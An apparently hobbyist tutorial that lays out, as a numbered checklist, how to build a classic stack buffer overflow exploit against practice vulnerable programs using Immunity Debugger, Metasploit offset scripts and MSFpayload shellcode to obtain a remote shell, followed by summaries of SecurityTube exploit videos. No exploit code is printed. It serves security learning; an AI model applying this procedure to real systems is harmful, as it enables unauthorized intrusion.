Writing Buffer Overflows for Non-Programmers

by Ashes

Buffer overflows have been a pretty serious security threat ever since Phrack Magazine published "Smashing The Stack For Fun And Profit" by Aleph One many years ago.

Buffer overflows are typically used to either crash a program or computer or to inject code into a program.

As a hacker without programming skills, it's sometimes difficult to grasp some concepts that involve coding, let alone attempt programming something myself.  Thanks to Vivek Ramachandran from SecurityTube.Net (PentesterAcademy) and his incredibly helpful videos, I am able to understand the concept of writing a buffer overflow.  I recommend watching the tutorial videos on Vivek's website to fully understand what is going on (be a hacker, not a script kiddie!).  However, I have broken down the process of writing a buffer overflow into a checklist for reference.  Hopefully this will help others understand how a buffer overflow works, and how to write one.  Vivek programs his exploit code in Python, but you can adapt your code to other languages.

Some Terms

• EIP  - Points to the address of the next instruction to be executed.
• ESP  - Points to top address of stack.

Steps

1.)  Open the Immunity Debugger (ID) application.  It should open with four windows:

• Register Window  - Where CPU registers are shown (top-right).
• Stack Window  - Where you can see memory stack data (bottom-right).
• Data Dump Window  - View memory locations (bottom-left).
• Code Window  - View the code that is currently executing (top-left).

2.)  Open the vulnerable program in ID, and hit the "Play" button at the top.

3.)  Use the pattern_create.rb script in Metasploit to create enough random characters to help identify the return address in ID.

4.)  Write a simple exploit program to send the characters created in Step 3 to the vulnerable program.  (See Resource #1 below at time 11:36.)

5.)  Launch the exploit code.

6.)  Switch back to the ID application.  Identify the value of EIP in the Registers Window.

7.)  Use the value of the EIP found in Step 6 as input to the pattern_offset.rb script (part of Metasploit).  The output will tell you where the EIP is found in the characters in Step 3.  For example, if the output is 268, you count 268 characters, and the next four characters is what is copied into the EIP.

8.)  For ESP, use the first five characters after ASCII in pattern_ offset.rb.  The output is most commonly (not always) four more than the EIP output (268 + 4 = 272).

(Note the addresses of ESP and EIP in the Registers Window correlate with the numbers in the Stack Window.)

9.)  To verify the addresses and offsets are correct, edit your exploit code.  Remove the characters from Step 3 and insert the character "A" as many times as the output from Step 7 (i.e., 268).  Append the character "B" as many times as the difference between the output of Step 8 and Step 7 (i.e., four).  Append the character "C" four times.  Append the character "D" a random number of times (i.e., 1900).

10.)  Open the vulnerable program in ID, and hit the "Play" button at the top.

11.)  Launch the exploit code.

12.)  In ID, the Registers Window should show the EIP as 42424242 which is the hex value for ASCII "B".  ESP should have the ASCII value of CCCCDDDDDDD...

13.)  In ID, note the address value of ESP (not the ASCII value).  In the exploit code, this value must be written in reverse by twos, with escape characters and hex interpretation, in the spot where the character "B" was written in Step 9.  Simply put, if the ESP address value is 0022FB70, it should be written in the exploit code as \x70\xFB\x22\x00.

14.)  Use MSFpayload to create a payload with C code output.

15.)  Copy the payload underneath unsigned char buf[]= and paste that into the exploit code where "C" is located in Step 9.  Remove the line in the code to print the character "D".

16.)  Set up Metasploit for an incoming connection.

17.)  Run the vulnerable program and launch the exploit code.  You should now have a shell on the system where the vulnerable program is installed.

Many thanks to Vivek Ramachandran for his great teaching ability.

Resources

1. www.securitytube.net/video/1398  Exploit Research MegaPrimer - Part 2: Memcpy Buffer Overflow  (YouTube)
• Welcome to Part 2 of the Exploit Research MegaPrimer.  Please begin this series by watching Part 1, if you have not already done so!  In this video, we will look at how to exploit a simple buffer overflow caused by misuse of the memcpy function.  You can download the vulnerable server Server-Memcpy.exe and follow this video.  I take you through a 30 minute journey which starts with bug discovery with a crash, analyzing the crash with Immunity Debugger, finding where the return address and ESP are overwritten using byte patterns created by pattern_create of the Metasploit framework, creating the payload, creating the exploit script and finally exploiting the vulnerable server!  The grand prize is that we are able to get a remote shell on the victim over port 10000.  Grab a coffee and join me in this epic journey from bug to root!  All in 30 minutes :)
2. www.securitytube.net/video/1399  Exploit Research MegaPrimer - Part 3: Strcpy Buffer Overflow  (YouTube)
• Welcome to Part 3 of the Exploit Research MegaPrimer.  Please begin this series by watching Part 1, if you have not already done so!  In this video, we will look at how to exploit a simple buffer overflow caused by misuse of the strcpy function.  You can download the vulnerable server Server-Strcpy.exe and follow this video.  We will take the vulnerable server, understand how it works, write a Python program to cause a buffer overflow, use Immunity Debugger to investigate the buffer overflow, find the offset of the Return Address and ESP from the start of the user input.  Then we will create a payload and try to exploit the overflow, but we will figure out that our payload and return address contains the bad character 0x00.  We will then learn how to find bad characters, use a JMP ESP address in a DLL to exploit this overflow, use MSFpayload and msfencode to create a payload without the bad characters to finally exploit this overflow!  We will be looking at some new concepts which include jumping to our payload on the stack using a "JMP ESP" instruction, finding and removing bad characters and understanding the need for a NOP sled.  Hope you enjoy this video!  It's a 30 minute long journey :)
3. www.securitytube.net/video/1400  Exploit Research MegaPrimer - Part 4: Minishare Buffer Overflow  (YouTube)
• Welcome to Part 4 of the Exploit Research MegaPrimer.  Please begin this series by watching Part 1, if you have not already done so!  In this video, we will look at how to exploit a buffer overflow which was disclosed on Exploit-Db - Minishare 1.4.1 Buffer Overflow.  You can download the Minishare v1.4.1 program and follow this video.  We will first start by understanding the vulnerability from it's description on Exploit-Db and then reproduce the same in our lab setup.  After this, we will use the Immunity Debgugger to examine the exploit conditions, find the offsets for RET and ESP overwrite, find the bad characters which are 0x00 and 0x0D, create shellcode for the payload encoding for these bad characters, create the exploit program and finally exploit the program!  This whole journey is 30 minutes long, so fasten your seat belts and take our your debuggers :)